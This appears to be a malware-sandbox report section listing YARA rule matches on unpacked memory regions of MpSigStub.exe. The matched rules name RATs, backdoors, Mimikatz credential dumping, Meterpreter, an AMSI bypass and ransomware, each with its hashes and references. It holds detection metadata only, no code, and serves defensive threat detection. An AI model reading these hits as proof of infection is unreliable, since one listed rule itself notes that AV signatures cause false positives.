Source: 38.3.MpSigStub.exe.138beaf1482.85.raw.unpack, type: UNPACKEDPE	Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138bda7f0be.62.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 38.3.MpSigStub.exe.138beac654a.116.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 38.3.MpSigStub.exe.138beac654a.116.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 38.3.MpSigStub.exe.138beac654a.116.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 38.3.MpSigStub.exe.138bd025981.88.raw.unpack, type: UNPACKEDPE	Matched rule: Gen_Net_LocalGroup_Administrators_Add_Command date = 2017-07-08, author = Florian Roth, description = Detects an executable that contains a command to add a user account to the local administrators group, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138bd025981.88.raw.unpack, type: UNPACKEDPE	Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 38.3.MpSigStub.exe.138bd0cf16e.156.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 38.3.MpSigStub.exe.138be567efd.37.raw.unpack, type: UNPACKEDPE	Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 38.3.MpSigStub.exe.138be567efd.37.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 38.3.MpSigStub.exe.138be8fa80e.86.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 38.3.MpSigStub.exe.138bd31742c.64.unpack, type: UNPACKEDPE	Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be62480a.80.unpack, type: UNPACKEDPE	Matched rule: Gen_Net_LocalGroup_Administrators_Add_Command date = 2017-07-08, author = Florian Roth, description = Detects an executable that contains a command to add a user account to the local administrators group, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be1451ae.105.raw.unpack, type: UNPACKEDPE	Matched rule: Trojan_Win32_PlaKeylog_B author = Microsoft, description = Keylogger component, activity_group = Platinum, version = 1.0, unpacked_sample_sha1 = 6a1412daaa9bdc553689537df0a004d44f8a45fd, last_modified = 2016-04-12, original_sample_sha1 = 0096a3e0c97b85ca75164f48230ae530c94a2b77
Source: 38.3.MpSigStub.exe.138be1451ae.105.raw.unpack, type: UNPACKEDPE	Matched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 38.3.MpSigStub.exe.138be1451ae.105.raw.unpack, type: UNPACKEDPE	Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 38.3.MpSigStub.exe.138be1451ae.105.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 38.3.MpSigStub.exe.138be1451ae.105.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT41_POISONPLUG date = 2019-08-07, hash4 = 3e6c4e97cc09d0432fbbbf3f3e424d4aa967d3073b6002305cd6573c47f0341f, hash3 = f4d57acde4bc546a10cd199c70cdad09f576fdfe66a36b08a00c19ff6ae19661, hash2 = 5d971ed3947597fbb7e51d806647b37d64d9fe915b35c7c9eaf79a37b82dab90, author = Florian Roth, description = Detects APT41 malware POISONPLUG, reference = https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html, score = 2eea29d83f485897e2bac9501ef000cc266ffe10019d8c529555a3435ac4aabd
Source: 38.3.MpSigStub.exe.138be1451ae.105.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE	Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE	Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE	Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE	Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE	Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE	Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE	Matched rule: HackTool_Samples description = Hacktool, score =
Source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE	Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE	Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE	Matched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
Source: 38.3.MpSigStub.exe.138bce174da.16.raw.unpack, type: UNPACKEDPE	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 38.3.MpSigStub.exe.138bd8c206c.234.raw.unpack, type: UNPACKEDPE	Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138bd8c206c.234.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE	Matched rule: korlia author = Nick Hoffman, reference = http://www.morphick.com/resources/lab-blog/curious-korlia, company = Morphick, information = korlia malware found in apt dump
Source: 38.3.MpSigStub.exe.138bde736d2.82.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 38.3.MpSigStub.exe.138bde736d2.82.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 38.3.MpSigStub.exe.138bde736d2.82.unpack, type: UNPACKEDPE	Matched rule: SUSP_PDB_Path_Keywords date = 2019-10-04, author = Florian Roth, description = Detects suspicious PDB paths, reference = https://twitter.com/stvemillertime/status/1179832666285326337?s=20
Source: 38.3.MpSigStub.exe.138bde736d2.82.unpack, type: UNPACKEDPE	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 38.3.MpSigStub.exe.138bde736d2.82.unpack, type: UNPACKEDPE	Matched rule: Greenbug_Malware_4 date = 2017-01-25, hash2 = 82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9, author = Florian Roth, description = Detects ISMDoor Backdoor, reference = https://goo.gl/urp4CD, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f
Source: 38.3.MpSigStub.exe.138bceeeac2.66.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bceeeac2.66.raw.unpack, type: UNPACKEDPE	Matched rule: Unspecified_Malware_Sep1_A1 date = 2017-09-12, hash1 = 28143c7638f22342bff8edcd0bedd708e265948a5fcca750c302e2dca95ed9f0, author = Florian Roth, description = Detects malware from DrqgonFly APT report, reference = https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: ZxShell_Jul17 date = 2017-07-08, hash1 = 5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16, author = Florian Roth, description = Detects a ZxShell - CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_NAME_SharPyShell date = 2021-01-22, author = Arnim Rupp, description = Detects .NET red/black-team tools via name, reference = https://github.com/antonioCoco/SharPyShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_NAME_DotNetInject date = 2021-01-22, author = Arnim Rupp, description = Detects .NET red/black-team tools via name, reference = https://github.com/dtrizna/DotNetInject, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_NAME_ibombshell date = 2021-01-22, author = Arnim Rupp, description = Detects .NET red/black-team tools via name, reference = https://github.com/Telefonica/ibombshell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_CsharpAmsiBypass date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/WayneJLee/CsharpAmsiBypass, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: ROKRAT_Nov17_1 date = 2017-11-28, author = Florian Roth, description = Detects ROKRAT malware, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: gh0st author = https://github.com/jackcr/
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: NetWiredRC_B date = 2014-12-23, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = NetWiredRC, version = 1.1
